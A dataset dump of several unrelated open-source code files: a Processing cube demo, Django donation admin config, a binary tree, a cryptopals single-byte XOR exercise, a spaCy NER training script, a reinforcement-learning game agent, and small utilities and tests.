    cubo.addVertex([1, -1, -1]) # D, 3
    cubo.addVertex([-1, -1, 1]) # E, 4
    cubo.addVertex([-1, 1, 1]) # F, 5
    cubo.addVertex([1, 1, 1]) # G, 6
    cubo.addVertex([1, -1, 1]) # H, 7
    # 12 edges: back face, front face, then the four connecting edges.
    cubo.addEdge([0, 1])
    cubo.addEdge([1, 2])
    cubo.addEdge([2, 3])
    cubo.addEdge([3, 0])
    cubo.addEdge([4, 5])
    cubo.addEdge([5, 6])
    cubo.addEdge([6, 7])
    cubo.addEdge([7, 4])
    cubo.addEdge([0, 4])
    cubo.addEdge([1, 5])
    cubo.addEdge([2, 6])
    cubo.addEdge([3, 7])
    cubo.scale([100, 100, 100])
    cubo.translate([(width/2), (height/2), 0])
    cubo.info = True
    cubo.border_color = 255
    Polyhedron.proj_angle = 45 # Projection angle shared via the class attribute; read by render().
    cubo.render()
def draw():
    """Processing draw loop: clear the frame, then show either the help
    overlay (with the axis gizmos) or the hint line (with the cube)."""
    background(0)
    # Both branches use the same text styling, so set it once.
    fill(95)
    textSize(16)
    if controls:
        text(controls_string_on, 100, 20)
        text(controls_string_extra, width-100, 20)
        x_axis.render()
        y_axis.render()
        z_axis.render()
    else:
        # NOTE(review): the cube is only drawn while the help overlay is
        # hidden -- confirm this is intended.
        text(controls_string_off, width/2, 20)
        cubo.render()
def keyPressed():
    """Processing keyboard handler: TAB toggles the help overlay, BACKSPACE
    resets the cube, Q/W/E/R/T/Y translate, A/S/D/F/G/H scale,
    Z/X/C/V/B/N rotate, and P cycles the projection method."""
    global controls
    if key == TAB:
        controls = not controls
        return
    if key == BACKSPACE:
        reset()
        return
    # Table-driven handling of the letter controls: each entry maps a key to
    # the cube attribute it adjusts, the axis index, and the step to apply.
    adjustments = {
        'q': ('translation', 0, 20), 'w': ('translation', 0, -20),
        'e': ('translation', 1, 20), 'r': ('translation', 1, -20),
        't': ('translation', 2, 20), 'y': ('translation', 2, -20),
        'a': ('scaling', 0, 5), 's': ('scaling', 0, -5),
        'd': ('scaling', 1, 5), 'f': ('scaling', 1, -5),
        'g': ('scaling', 2, 5), 'h': ('scaling', 2, -5),
        'z': ('rotation', 0, 5), 'x': ('rotation', 0, -5),
        'c': ('rotation', 1, 5), 'v': ('rotation', 1, -5),
        'b': ('rotation', 2, 5), 'n': ('rotation', 2, -5),
    }
    pressed = str(key).lower()
    if pressed in adjustments:
        attribute, axis, step = adjustments[pressed]
        getattr(cubo, attribute)[axis] += step
    elif pressed == 'p':
        # Cycle through the three projection methods (0, 1, 2).
        Polyhedron.render_method = (Polyhedron.render_method + 1) % 3
def reset():
    """Restore the demo cube to its initial transform (the same scale and
    position that setup() applied, with rotation zeroed)."""
    global cubo
    cubo.scale([100, 100, 100])
    cubo.translate([(width/2), (height/2), 0])
    cubo.rotate([0, 0, 0])
| felipedeoliveirarios/trabalho_cg | Old/polyhedron/polyhedron.pyde | polyhedron.pyde | pyde | 11,006 | python | en | code | 1 | github-code | 13 |
7830089880 | from django.contrib import admin
from cl.donate.models import Donation, MonthlyDonation
@admin.register(Donation)
class DonationAdmin(admin.ModelAdmin):
    """Django-admin configuration for one-off donations."""

    # Timestamps are system-managed; never hand-edited.
    readonly_fields = (
        "date_modified",
        "date_created",
    )
    list_display = (
        "__str__",
        "amount",
        "payment_provider",
        "status",
        "date_created",
        "referrer",
    )
    list_filter = (
        "payment_provider",
        "status",
        "referrer",
    )
    # Raw-id widget avoids loading every donor into a dropdown.
    raw_id_fields = ("donor",)
class DonationInline(admin.StackedInline):
    """Inline donation list for embedding on a related model's admin page."""
    model = Donation
    extra = 0
@admin.register(MonthlyDonation)
class MonthlyDonationAdmin(admin.ModelAdmin):
    """Django-admin configuration for recurring (monthly) donations."""

    # Timestamps are system-managed; never hand-edited.
    readonly_fields = (
        "date_created",
        "date_modified",
    )
    list_display = (
        "__str__",
        "donor_id",
        "enabled",
        "monthly_donation_amount",
        "failure_count",
        "monthly_donation_day",
    )
    list_filter = (
        "enabled",
        "failure_count",
        "monthly_donation_day",
    )
    # Raw-id widget avoids loading every donor into a dropdown.
    raw_id_fields = ("donor",)
class MonthlyDonationInline(admin.TabularInline):
    """Inline monthly-donation list for a related model's admin page."""
    model = MonthlyDonation
    extra = 0
| freelawproject/courtlistener | cl/donate/admin.py | admin.py | py | 1,156 | python | en | code | 435 | github-code | 13 |
class ListNode:
    """A binary-tree node: a value plus left/right child links.

    NOTE(review): despite the name this is a *tree* node (it has left and
    right children), not a linked-list node; the name is kept so existing
    callers keep working.
    """

    def __init__(self, val):
        self.val = val      # payload stored in this node
        self.left = None    # left child, or None
        self.right = None   # right child, or None

    def __repr__(self):
        # Added for debuggability; purely additive, no caller relies on it.
        return "ListNode({!r})".format(self.val)


class Tree:
    """A complete binary tree that is filled level by level, left to right."""

    def __init__(self):
        # An empty tree is represented by a None root.
        self.root = None

    def add(self, item):
        """Insert *item* into the first free slot in level order.

        Walks the tree breadth-first with a FIFO queue; collections.deque
        makes the left-end pop O(1) (the original list.pop(0) was O(n)
        per step).
        """
        from collections import deque

        node = ListNode(item)
        if not self.root:
            # First insertion: the new node becomes the root.
            self.root = node
            return
        queue = deque([self.root])
        while True:
            current = queue.popleft()
            # Attach as the left child if that slot is free ...
            if current.left:
                queue.append(current.left)
            else:
                current.left = node
                return
            # ... otherwise as the right child if that one is free.
            if current.right:
                queue.append(current.right)
            else:
                current.right = node
                return

    def breadth_travel(self):
        """Print all values in level order (top to bottom, left to right),
        separated by single spaces.  Prints nothing for an empty tree."""
        from collections import deque

        if not self.root:
            return
        queue = deque([self.root])
        while queue:
            current = queue.popleft()
            print(current.val, end=" ")
            if current.left:
                queue.append(current.left)
            if current.right:
                queue.append(current.right)
if __name__ == "__main__":
    # Demo: fill a complete binary tree with 1..9 and print its level-order
    # traversal ("1 2 3 4 5 6 7 8 9").
    tree = Tree()
    for value in range(1, 10):
        tree.add(value)
    tree.breadth_travel()
| 15149295552/Code | Month09/day04_DATASTRUCT/code/04_binary_tree.py | 04_binary_tree.py | py | 1,599 | python | ja | code | 1 | github-code | 13 |
26000757342 | from __future__ import unicode_literals, print_function
import pickle
import plac
import random
from pathlib import Path
import spacy
from spacy.util import minibatch, compounding
import os
from os import listdir
import plac
import logging
import argparse
import sys
import json
import pickle
from PIL import Image
import os.path, sys
import matplotlib.pyplot as plt
# importing pandas module
import pandas as pd
import csv
path = os.path.abspath("./him.csv")
path2 = os.path.abspath("./")

# Load the raw annotation dump.  BUG FIX: the original passed sep='/t'
# (slash-t), which pandas treats as a two-character regex separator and so
# never matches a real tab; '\t' is the intended tab separator.
data = pd.read_csv(path, sep='\t', encoding='unicode_escape')

# dropping passed columns
# data.drop(["Unnamed: 2"], axis = 1, inplace = True)

# (Notebook artifact: displays the frame when run interactively.)
data

# Re-export as a plain CSV.
data.to_csv(r'docs(1).csv', index=False)

# Convert the CSV to a tab-separated file.  BUG FIX: the original wrote with
# delimiter=',' even though the result is consumed by tab-splitting code
# (tsv_to_json_format below splits on '\t'); use a real tab delimiter.
with open('docs(1).csv', 'r') as csvin, open('ner_dataset1.txt', 'w') as tsvout:
    reader = csv.reader(csvin)
    writer = csv.writer(tsvout, delimiter='\t')
    for row in reader:
        writer.writerow(row)
# Convert .tsv file to dataturks json format.
import json
import logging
import sys
def tsv_to_json_format(input_path,output_path,unknown_label):
    """Convert a two-column (word TAB entity) file into Dataturks-style JSON
    lines: one {"content": ..., "annotation": [...]} object per sentence,
    written to *output_path*.  Tokens labelled *unknown_label* are skipped.

    Sentences appear to be separated by lines consisting of a single tab
    character (see the != '\\t' test below) -- TODO confirm against the
    upstream dataset format.
    """
    try:
        f=open(input_path,'r') # input file
        fp=open(output_path, 'w') # output file
        # NOTE(review): neither handle is closed on success; consider
        # `with open(...)` blocks.
        data_dict={}
        annotations =[]
        label_dict={}
        s=''
        start=0
        for line in f:
            if line[0:len(line)-1]!='\t':
                # Token line: "<word>\t<entity>\n".
                word,entity=line.split('\t')
                s+=word+" "
                # print(s)
                entity=entity[:len(entity)-1]  # strip the trailing newline
                if entity!=unknown_label:
                    if len(entity) != 1:
                        # Record this word's character span in the sentence.
                        d={}
                        d['text']=word
                        d['start']=start
                        d['end']=start+len(word)-1
                        try:
                            label_dict[entity].append(d)
                        except:
                            # First occurrence of this entity label.
                            label_dict[entity]=[]
                            label_dict[entity].append(d)
                start+=len(word)+1
            else:
                # Sentence separator: flush the accumulated sentence.
                data_dict['content']=s
                s=''
                label_list=[]
                # Merge identical surface forms of one label into a single
                # annotation carrying several point dicts.
                for ents in list(label_dict.keys()):
                    for i in range(len(label_dict[ents])):
                        if(label_dict[ents][i]['text']!=''):
                            l=[ents,label_dict[ents][i]]
                            for j in range(i+1,len(label_dict[ents])):
                                if(label_dict[ents][i]['text']==label_dict[ents][j]['text']):
                                    di={}
                                    di['start']=label_dict[ents][j]['start']
                                    di['end']=label_dict[ents][j]['end']
                                    di['text']=label_dict[ents][i]['text']
                                    l.append(di)
                                    # Blank the duplicate so it isn't re-emitted.
                                    label_dict[ents][j]['text']=''
                            label_list.append(l)
                for entities in label_list:
                    label={}
                    label['label']=[entities[0]]
                    label['points']=entities[1:]
                    annotations.append(label)
                data_dict['annotation']=annotations
                annotations=[]
                json.dump(data_dict, fp)
                print(data_dict)
                fp.write('\n')
                # Reset the per-sentence state.
                data_dict={}
                start=0
                label_dict={}
    except Exception as e:
        logging.exception("Unable to process file" + "\n" + "error = " + str(e))
        return None
tsv_to_json_format(r"ner_dataset1(3)(1).txt",r'ner_dataset11.json','abc')
#spacy format
# @plac.annotations(input_file=("/content/demo.json", "option", "i", str), output_file=("/content/out.json", "option", "o", str))
def main(input_file='ner_dataset11.json', output_file='out.json'):
    """Convert Dataturks-style JSON-lines annotations into spaCy's
    (text, {"entities": [(start, end, label), ...]}) training format and
    pickle the result to *output_file*.  Returns None; on any failure the
    error is logged and None is returned without writing the output."""
    try:
        examples = []
        with open(input_file, 'r') as source:
            for raw_line in source:
                record = json.loads(raw_line)
                spans = []
                for annotation in record['annotation']:
                    first_point = annotation['points'][0]
                    labels = annotation['label']
                    if not isinstance(labels, list):
                        labels = [labels]
                    # spaCy's end offset is exclusive, hence the + 1.
                    spans.extend(
                        (first_point['start'], first_point['end'] + 1, label)
                        for label in labels
                    )
                examples.append((record['content'], {"entities": spans}))
        with open(output_file, 'wb') as sink:
            pickle.dump(examples, sink)
    except Exception as e:
        logging.exception("Unable to process " + input_file + "\n" + "error = " + str(e))
        return None
main()
# New entity labels
# Specify the new entity labels which you want to add here
# NOTE(review): LABEL is currently unused -- the training loop below derives
# its labels from TRAIN_DATA (the add_label loop over LABEL is commented out
# in main()).
LABEL = [u'invoiceno', u'invoicedate', u'customer', u'vendor', u'product', u'address', u'amount']
# Load the pickled (text, {"entities": ...}) examples produced above.
# SECURITY: pickle.load executes arbitrary code from the file -- only load
# files this script itself produced.
with open ('out.json', 'rb') as fp:
    TRAIN_DATA = pickle.load(fp)
# @plac.annotations(
#     model=("Model name. Defaults to blank 'en' model.", "option", "m", str),
#     new_model_name=("New model name for model meta.", "option", "nm", str),
#     output_dir=("Optional output directory", "option", "o", Path),
#     n_iter=("Number of training iterations", "option", "n", int))
def main(model=None, new_model_name='new_model', output_dir= path2 , n_iter=10):
    """Setting up the pipeline and entity recognizer, and training the new entity.

    Uses the spaCy v2 training API (create_pipe / begin_training / nlp.update).
    NOTE(review): this redefines the earlier conversion main(); also the
    output_dir and new_model_name parameters are ignored -- the model is
    always saved to the hard-coded ./him.11 directory below.
    """
    if model is not None:
        nlp = spacy.load(model) # load existing spacy model
        print("Loaded model '%s'" % model)
    else:
        nlp = spacy.blank('en') # create blank Language class
        print("Created blank 'en' model")
    # Ensure an NER component exists in the pipeline.
    if 'ner' not in nlp.pipe_names:
        ner = nlp.create_pipe('ner')
        nlp.add_pipe(ner)
    else:
        ner = nlp.get_pipe('ner')
    # for i in LABEL:
    # ner.add_label(i) # Add new entity labels to entity recognizer
    # Register every entity label that occurs in the training data.
    for _, annotations in TRAIN_DATA:
        for ent in annotations.get('entities'):
            ner.add_label(ent[2])
    if model is None:
        optimizer = nlp.begin_training()
    else:
        optimizer = nlp.entity.create_optimizer()
    # Get names of other pipes to disable them during training to train only NER
    other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner']
    with nlp.disable_pipes(*other_pipes):  # only train NER
        for itn in range(n_iter):
            random.shuffle(TRAIN_DATA)
            losses = {}
            # Increasing batch sizes from 4 to 32 (spaCy's recommended schedule).
            batches = minibatch(TRAIN_DATA, size=compounding(4., 32., 1.001))
            for batch in batches:
                texts, annotations = zip(*batch)
                nlp.update(texts, annotations, sgd=optimizer, drop=0.35,
                           losses=losses)
            print('Losses', losses)
    # save model to output directory
    # NOTE(review): output_dir (the parameter) is not used here.
    new= os.path.abspath("./him.11")
    output_dir1 = new
    if output_dir1 is not None:
        output_dir1 = Path(output_dir1)
        if not output_dir1.exists():
            output_dir1.mkdir()
        nlp.to_disk(output_dir1)
        print("Saved model to", output_dir1)
main()
| Teknowmics-Internship/Invoice-extraction | NER Train model (1).py | NER Train model (1).py | py | 7,353 | python | en | code | 0 | github-code | 13 |
2526262426 | import random
from sys import maxsize
from copy import deepcopy
import json
import numpy as np
import torch
from torch.optim import Adam
from . import gamelib
from . import constants
from . import utils
from .arch.model import FeatureEncoder, PolicyNet
"""
Most of the algo code you write will be in this file unless you create new
modules yourself. Start by modifying the 'on_turn' function.
Advanced strategy tips:
- You can analyze action frames by modifying on_action_frame function
- The GameState.map object can be manually manipulated to create hypothetical
board states. Though, we recommended making a copy of the map to preserve
the actual current map state.
"""
class AlgoStrategy(gamelib.AlgoCore):
def __init__(self, args):
super().__init__()
seed = random.randrange(maxsize)
random.seed(seed)
gamelib.debug_write('Random seed: {}'.format(seed))
self.device = 'cpu'
gamelib.debug_write('Using {}'.format(self.device))
self.is_learning = args.is_learning
if self.is_learning:
gamelib.debug_write("I'm LEARNING!")
self.lr = 0.01
self.is_enemy = args.is_enemy
if self.is_enemy:
gamelib.debug_write("I'm EVIL so I'm not LEARNING! Ignoring is_learning...")
self.is_learning = False
self.is_prod = args.is_prod
if self.is_prod:
gamelib.debug_write("Production mode. Ignoring is_learning, is_enemy...")
self.is_learning = False
self.is_enemy = False
self.checkpoint_manager = utils.CheckpointManager(self.is_enemy, self.is_prod)
def on_game_start(self, config):
"""
Read in config and perform any initial setup here
"""
gamelib.debug_write('Configuring your custom algo strategy...')
self.config = config
global WALL, SUPPORT, TURRET, SCOUT, DEMOLISHER, INTERCEPTOR, MP, SP, STRUCTURE_ONEHOT
WALL = config["unitInformation"][0]["shorthand"]
SUPPORT = config["unitInformation"][1]["shorthand"]
TURRET = config["unitInformation"][2]["shorthand"]
SCOUT = config["unitInformation"][3]["shorthand"]
DEMOLISHER = config["unitInformation"][4]["shorthand"]
INTERCEPTOR = config["unitInformation"][5]["shorthand"]
MP = 1
SP = 0
STRUCTURE_ONEHOT = {WALL: [1, 0, 0], SUPPORT: [0, 1, 0], TURRET: [0, 0, 1]}
# This is a good place to do initial setup
self.scored_on_locations = []
self.setup_policy_net()
if self.is_learning:
self.setup_vanila_policy_gradient()
def setup_policy_net(self):
self.feature_encoder = FeatureEncoder().to(self.device)
self.policy = PolicyNet(self.device).to(self.device)
if self.is_learning:
params = list(self.feature_encoder.parameters()) + list(self.policy.parameters())
self.optimizer = Adam(params, lr=self.lr)
if self.checkpoint_manager.checkpoint_exists():
gamelib.debug_write('Loading model weights...')
feature_encoder_path, policy_path, optimizer_path = self.checkpoint_manager.get_latest_model_path()
self.feature_encoder.load_state_dict(torch.load(feature_encoder_path))
self.policy.load_state_dict(torch.load(policy_path))
if self.is_learning:
self.optimizer.load_state_dict(torch.load(optimizer_path))
self.memory_state = self.policy.init_hidden_state()
def on_turn(self, turn_state):
"""
This function is called every turn with the game state wrapper as
an argument. The wrapper stores the state of the arena and has methods
for querying its state, allocating your current resources as planned
unit deployments, and transmitting your intended deployments to the
game engine.
"""
game_state = gamelib.GameState(self.config, turn_state)
gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))
game_state.suppress_warnings(True) #Comment or remove this line to enable warnings.
self.policy_net_strategy(game_state)
game_state.submit_turn()
def policy_net_strategy(self, game_state):
if self.is_learning:
action_type_logps, location_logps = [], []
spatial_features, scalar_features = self.game_state_to_features(game_state)
observation_features = self.feature_encoder(spatial_features, scalar_features)
action_type = torch.tensor(9)
location = torch.tensor([0,0])
while action_type != constants.NOOP:
action_type, _, action_type_logp, location, _, location_logp, self.memory_state \
= self.policy(observation_features, action_type, location, game_state, self.memory_state)
if action_type in constants.STRUCTURES + constants.MOBILES:
game_state.attempt_spawn(constants.ACTION_SHORTHAND[action_type], [location])
elif action_type == constants.UPGRADE:
game_state.attempt_upgrade([location])
elif action_type == constants.REMOVE:
game_state.attempt_remove([location])
if self.is_learning:
action_type_logps.append(action_type_logp)
location_logps.append(location_logp)
# when all actions has been taken, flush the queue mask in policy net's action head
self.policy.flush_queue_mask()
if self.is_learning:
if game_state.turn_number > 0: # skip turn 0 reward
reward_prev_turn = self.compute_reward(game_state)
self.ep_rews.append(reward_prev_turn)
self.ep_action_type_logps.append(action_type_logps)
self.ep_location_logps.append(location_logps)
def game_state_to_features(self, game_state):
# spatial features
spatial_features = deepcopy(game_state.game_map._GameMap__map)
for x in range(len(spatial_features)):
for y in range(len(spatial_features[x])):
if len(spatial_features[x][y]) > 0:
unit = spatial_features[x][y][0]
feature = []
feature += STRUCTURE_ONEHOT[unit.unit_type]
feature += [unit.health]
feature += [unit.player_index==1, unit.player_index==2]
feature += list(map(int, [unit.pending_removal, unit.upgraded]))
# TODO: add features
spatial_features[x][y] = feature
else:
spatial_features[x][y] = [0] * 8
spatial_features = torch.tensor(spatial_features, dtype=torch.float).to(self.device)
spatial_features = spatial_features.permute(2, 0, 1)
spatial_features = torch.unsqueeze(spatial_features, 0)
# scalar features
# TODO: should data whitening be in model or here?
scalar_features = [game_state.my_health] + game_state.get_resources(0)
scalar_features += [game_state.enemy_health] + game_state.get_resources(1)
scalar_features += [game_state.turn_number]
scalar_features = torch.tensor(scalar_features, dtype=torch.float).to(self.device)
scalar_features = torch.unsqueeze(scalar_features, 0)
return spatial_features, scalar_features
# Methods for reinforcement learning
def on_final_reward(self,game_state_string):
if self.is_learning:
turn_state = json.loads(game_state_string)
# change of health
my_health = float(turn_state.get('p1Stats')[0])
enemy_health = float(turn_state.get('p2Stats')[0])
reward = my_health - self.my_health
reward += self.enemy_health - enemy_health
# additional reward of winner or loser
self.winner = int(turn_state.get('endStats')['winner'])
win_or_not_reward = constants.WINNER_REWARD if self.winner == 1 else constants.LOSER_REWARD
reward += win_or_not_reward
# append the last reward
self.ep_rews.append(reward)
# get turn number in total
self.total_turn = int(turn_state.get('turnInfo')[1])
def on_game_end(self):
if self.is_learning:
# train
gamelib.debug_write('Optimizing policy network...')
self.optimizer.zero_grad()
episode_loss = self.compute_loss()
episode_loss.backward()
self.optimizer.step()
# log metrics
self.loss = episode_loss.item()
stats_dict = self.get_statistics()
gamelib.debug_write(stats_dict)
# checkpoint
self.checkpoint_manager.save_model(self.feature_encoder, self.policy, self.optimizer)
self.checkpoint_manager.save_stats(stats_dict)
def setup_vanila_policy_gradient(self):
self.my_health = self.enemy_health = self.config['resources']['startingHP']
self.ep_action_type_logps = []
self.ep_location_logps = []
self.ep_rews = []
def compute_reward(self, game_state):
reward = game_state.my_health - self.my_health
reward += self.enemy_health - game_state.enemy_health
self.my_health, self.enemy_health = game_state.my_health, game_state.enemy_health
return reward
def compute_loss(self):
self.action_lengths = [len(logps) for logps in self.ep_action_type_logps]
ep_weights = list(self.reward_to_go())
batch_weights = []
for action_len, weight in zip(self.action_lengths, ep_weights):
batch_weights.extend([weight / action_len] * action_len)
batch_action_type_logps = [logp for logps in self.ep_action_type_logps for logp in logps]
batch_location_logps = [logp for logps in self.ep_location_logps for logp in logps]
self.ep_ret = batch_weights
batch_weights = torch.tensor(batch_weights, dtype=torch.float32).to(self.device)
batch_action_type_logps = torch.cat(batch_action_type_logps)
batch_location_logps = torch.cat(batch_location_logps)
action_type_loss = -(batch_action_type_logps * batch_weights).mean()
location_loss = -(batch_location_logps * batch_weights).mean()
return action_type_loss + location_loss
def reward_to_go(self):
n = len(self.ep_rews)
rtgs = np.zeros_like(self.ep_rews)
gamma = constants.GAMMA
for i in reversed(range(n)):
rtgs[i] = self.ep_rews[i] + gamma*(rtgs[i+1] if i+1 < n else 0)
return rtgs
def get_statistics(self):
stats = dict()
# winner and turn_number
stats['winner'] = self.winner
stats['total_turn'] = self.total_turn
# policy gradient loss
stats['policy_gradient_loss'] = self.loss
# reward and return in theory
stats['episode_length'] = len(self.ep_rews)
stats['episode_return'] = sum(self.ep_rews)
stats['reward_mean'] = np.mean(self.ep_rews)
stats['reward_std'] = np.std(self.ep_rews)
stats['reward_max'] = max(self.ep_rews)
stats['reward_min'] = min(self.ep_rews)
# actual return experienced by the agent
stats['return_cumulative'] = sum(self.ep_ret)
stats['return_mean'] = np.mean(self.ep_ret)
stats['return_std'] = np.std(self.ep_ret)
stats['return_max'] = max(self.ep_ret)
stats['return_min'] = min(self.ep_ret)
# actions
stats['action_length_cumulative'] = sum(self.action_lengths)
stats['action_length_mean'] = np.mean(self.action_lengths)
stats['action_length_std'] = np.std(self.action_lengths)
stats['action_length_max'] = max(self.action_lengths)
stats['action_length_min'] = min(self.action_lengths)
return stats
| wllmzhu/alpha-terminal | python-algo/src/algo_strategy.py | algo_strategy.py | py | 12,225 | python | en | code | 1 | github-code | 13 |
24337818175 | import binascii
def xor_single_byte(data, key):
    """Return *data* with every character XORed against the byte *key*.

    Works on str in both Python 2 and 3; extracted as a helper so the core
    transform is testable.  Uses ''.join instead of the original quadratic
    string concatenation.
    """
    return "".join(chr(ord(ch) ^ key) for ch in data)


if __name__ == "__main__":
    # Python 2 CLI (raw_input): read a hex-encoded ciphertext and print the
    # plaintext candidate for every possible single-byte XOR key.
    print("ENTER THE STRING")
    input_string = raw_input()
    decoded = binascii.unhexlify(input_string)
    # BUG FIX: the original range(0, 255) never tried key 255; a single byte
    # has 256 possible values.
    for candidate_key in range(256):
        print(xor_single_byte(decoded, candidate_key))
| nsg1999/cryptopals | Single_byte_XOR.py | Single_byte_XOR.py | py | 231 | python | en | code | 0 | github-code | 13 |
14288739346 | # -*- coding: utf-8 -*-
"""
Truncates string or JSON data so that it fits a specific number of characters.
"""
__author__ = "Jakrin Juangbhanich"
__email__ = "juangbhanich.k@gmail.com"
def truncate(message: str, max_length: int = 128, split_ratio: float = 0.8) -> str:
    """Shorten *message* when it exceeds *max_length* characters.

    The string is cut at the *split_ratio* point of the budget and the
    remaining tail is appended after a " ... " marker, so the result keeps
    both the start and the end of the original.  A *max_length* of 0
    disables truncation.  Note the marker itself adds five characters on
    top of *max_length*.
    """
    if max_length == 0:
        return message
    if len(message) <= max_length:
        return message
    head_length = int(max_length * split_ratio)
    tail_length = max_length - head_length
    return message[:head_length] + " ... " + message[-tail_length:]
| krinj/logkit | logkit/utils/truncate.py | truncate.py | py | 737 | python | en | code | 4 | github-code | 13 |
797264922 | #!/usr/bin/env python
import itertools
'''
https://code.google.com/codejam/contest/8384486/dashboard#s=p2&a=2
Brute force solution
'''
def solve(l, names):
    """For each of the three names, decide whether some alphabet ordering
    makes it the alphabetically-middle name; returns "YES"/"NO" flags
    joined by spaces.  (*l* is the name length from the input format and
    is unused, kept for interface compatibility.)"""
    letters = set(''.join(names))
    can_be_middle = [False] * 3
    # Brute force: try every possible ranking of the letters.
    for ranks in itertools.permutations(range(len(letters))):
        rank_of = dict(zip(letters, ranks))
        # Sort name indices by their letter-rank sequence under this alphabet.
        order = sorted(range(len(names)),
                       key=lambda idx: [rank_of[ch] for ch in names[idx]])
        can_be_middle[order[1]] = True
    return " ".join("YES" if flag else "NO" for flag in can_be_middle)
if __name__ == "__main__":
    # Code Jam driver: first line is the case count; each case gives a name
    # length then the three names on one line.
    cases = int(input())
    for case in range(1, cases+1):
        l = int(input())
        names = input().split()
        print("Case #{}: {}".format(case, solve(l, names)))
'''
python3 centrists.py < C-small-attempt0.in > out-
diff out- out-C-small
'''
| christabella/code-busters | centrists_naive.py | centrists_naive.py | py | 1,002 | python | en | code | 2 | github-code | 13 |
74468148817 | '''
Main file to run, this will produce a video
using MatplotLib and display the results
within a GUI
'''
import matplotlib.pyplot as plt
import matplotlib.image as mimg
import os
import cv2
from models import GestureAngleClassifier
#Matplotlib jargon to setup GUI for one frame
def display_image(path, pred):
    """Render one frame in the Matplotlib GUI: clear the figure, show the
    image at *path*, overlay the (label, similarity) pair from *pred*,
    then pause briefly so the window updates."""
    plt.clf()
    frame = mimg.imread(path)
    plt.imshow(frame)
    caption = pred[0] + ' Similarity: ' + str(pred[1])
    plt.text(0, 0, caption)
    plt.pause(0.1)
    plt.draw()
# Plays the folder of frames as a video, annotating each with the classifier's
# prediction.
def display(input_folder):
    SIZE = 20
    FONT_SIZE = 22
    model = GestureAngleClassifier('train_angles.npy', 'train_labels.npy') #Instantiating a model for classification
    #Calibrating the Matplotlib GUI variables
    plt.rcParams["figure.figsize"] = (SIZE,SIZE)
    plt.rcParams.update({'font.size': FONT_SIZE})
    plt.show()
    #Display using frame-by-frame basis
    # NOTE(review): every frame displays the same hard-coded OpenPose result
    # image while the prediction comes from the per-frame file -- confirm
    # this is intended.
    for path in os.listdir(input_folder):
        display_image('./similarity_output/openpose_result.jpg', model.get_predictions(input_folder + '/' + path))
display('./shot2')
7531728449 | from cStringIO import StringIO
import django
from django.utils import translation
import jingo
from jingo.tests.test_helpers import render
from mock import patch
from nose import with_setup
from nose.tools import eq_, ok_
import tower
from tower.tests.helpers import fake_extract_from_dir
from tower import ugettext as _, ungettext as n_
from tower import ugettext_lazy as _lazy, ungettext_lazy as n_lazy
from tower.management.commands.extract import create_pofile_from_babel
# Used for the _lazy() tests.  These are built at import time, before any
# locale is active -- which is the point of laziness: they must only resolve
# when coerced with unicode() inside a test.
_lazy_strings = {}
_lazy_strings['nocontext'] = _lazy('this is a test')
_lazy_strings['context'] = _lazy('What time is it?', 'context_one')
# s_* = singular form (count 1), p_* = plural form (count 3); the *_context
# entries additionally carry a gettext message context.
n_lazy_strings = {}
n_lazy_strings['s_nocontext'] = n_lazy('one light !', 'many lights !', 1)
n_lazy_strings['p_nocontext'] = n_lazy('one light !', 'many lights !', 3)
n_lazy_strings['s_context'] = n_lazy('%d poodle please', '%d poodles please',
                                     1, 'context_one')
n_lazy_strings['p_context'] = n_lazy('%d poodle please', '%d poodles please',
                                     3, 'context_one')
def setup():
    # nose fixture: activate the 'xx' test locale before a test runs.
    tower.activate('xx')
def setup_yy():
    # Alternate fixture for tests needing the 'yy' locale (extra plural forms).
    tower.activate('yy')
def teardown():
    # nose fixture: clear any active locale after a test.
    tower.deactivate_all()
def test_install_jinja_translations():
    """By default, activating a locale installs tower's gettext into the
    Jinja2 environment globals."""
    jingo.env.install_null_translations()
    tower.activate('xx')
    eq_(jingo.env.globals['gettext'], _)
@patch.object(tower, 'INSTALL_JINJA_TRANSLATIONS', False)
def test_no_install_jinja_translations():
    """
    Setting `TOWER_INSTALL_JINJA_TRANSLATIONS` to False should skip setting
    the gettext and ngettext functions in the Jinja2 environment.
    """
    jingo.env.install_null_translations()
    tower.activate('xx')
    ok_(jingo.env.globals['gettext'] != _)
@with_setup(setup, teardown)
def test_ugettext():
    """_() collapses internal whitespace and resolves the translation,
    optionally distinguished by a message context."""
    # No context
    a_text = " this\t\r\n\nis a\ntest \n\n\n"
    p_text = "you ran a test!"
    eq_(p_text, _(a_text))
    # With a context
    a_text = "\n\tWhat time \r\nis it? \n"
    p_text_1 = "What time is it? (context=1)"
    p_text_2 = "What time is it? (context=2)"
    eq_(p_text_1, _(a_text, 'context_one'))
    eq_(p_text_2, _(a_text, 'context_two'))
@with_setup(setup, teardown)
def test_ugettext_not_found():
    """Untranslated strings fall back to the whitespace-collapsed msgid."""
    eq_('yo', _('yo'))
    eq_('yo yo', _(' yo yo '))
    eq_('yo', _('yo', 'context'))
    eq_('yo yo', _(' yo yo ', 'context'))
@with_setup(setup, teardown)
def test_ungettext():
    """n_() picks singular vs plural by count, collapses whitespace, and
    honours message contexts."""
    # No context
    a_singular = " one\t\r\n\nlight \n\n!\n"
    a_plural = " many\t\r\n\nlights \n\n!\n"
    p_singular = "you found a light!"
    p_plural = "you found a pile of lights!"
    eq_(p_singular, n_(a_singular, a_plural, 1))
    eq_(p_plural, n_(a_singular, a_plural, 3))
    # With a context
    a_singular = "%d \n\n\tpoodle please"
    a_plural = "%d poodles\n\n\t please\n\n\n"
    p_singular_1 = "%d poodle (context=1)"
    p_plural_1 = "%d poodles (context=1)"
    p_singular_2 = "%d poodle (context=2)"
    p_plural_2 = "%d poodles (context=2)"
    eq_(p_singular_1, n_(a_singular, a_plural, 1, 'context_one'))
    eq_(p_plural_1, n_(a_singular, a_plural, 3, 'context_one'))
    eq_(p_singular_2, n_(a_singular, a_plural, 1, 'context_two'))
    eq_(p_plural_2, n_(a_singular, a_plural, 3, 'context_two'))
@with_setup(setup, teardown)
def test_ungettext_not_found():
    """Untranslated plurals fall back to the collapsed singular or plural
    msgid depending on the count."""
    eq_('yo', n_('yo', 'yos', 1, 'context'))
    eq_('yo yo', n_(' yo yo ', 'yos', 1, 'context'))
    eq_('yos', n_('yo', 'yos', 3, 'context'))
    eq_('yo yos', n_('yo', ' yo yos ', 3, 'context'))
@with_setup(setup, teardown)
def test_ugettext_lazy():
    """Lazy strings built at import time resolve when coerced under an
    active locale."""
    eq_(unicode(_lazy_strings['nocontext']), 'you ran a test!')
